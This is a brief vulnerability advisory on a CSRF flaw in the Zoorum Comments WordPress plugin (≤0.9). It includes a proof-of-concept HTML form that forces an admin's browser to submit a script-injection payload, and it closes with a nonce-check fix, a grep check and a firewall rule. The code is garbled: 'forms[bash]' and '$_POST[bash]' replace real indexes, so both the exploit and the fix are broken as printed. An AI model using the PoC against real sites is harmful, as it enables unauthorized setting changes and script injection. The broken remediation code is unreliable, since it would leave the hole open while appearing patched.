The Zoorum Comments plugin (≤ v0.9) fails to validate nonces in the `zoorum_set_options()` function, allowing attackers to forge requests. When an admin clicks a malicious link, attacker-controlled payloads execute without consent, modifying settings or injecting scripts due to missing CSRF protections.
DailyCVE Form
Platform: WordPress
Version: ≤0.9
Vulnerability: CSRF
Severity: Medium
Date: 03/28/2025
What Undercode Say:
Exploit:
<!-- Malicious CSRF PoC --> <form action="http://target/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="zoorum_set_options"> <input type="hidden" name="payload" value="<script>alert(1)</script>"> </form> <script>document.forms[bash].submit();</script>
Protection:
1. Patch via plugin update.
2. Add nonce checks:
function zoorum_set_options() {
if (!wp_verify_nonce($_POST[bash], 'zoorum_nonce')) {
wp_die('Invalid nonce');
}
// Rest of logic
}
Analytics:
- CVSS: 6.5 (Medium)
- Attack Vector: Network
- Privileges Required: None
- User Interaction: Required
Detection:
Grep for vulnerable function grep -r "function zoorum_set_options" /var/www/html/
Mitigation Commands:
Temporary fix: Restrict admin access iptables -A INPUT -p tcp --dport 80 -s !TRUSTED_IP -j DROP
References:
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2163
Extra Source Hub:
Undercode
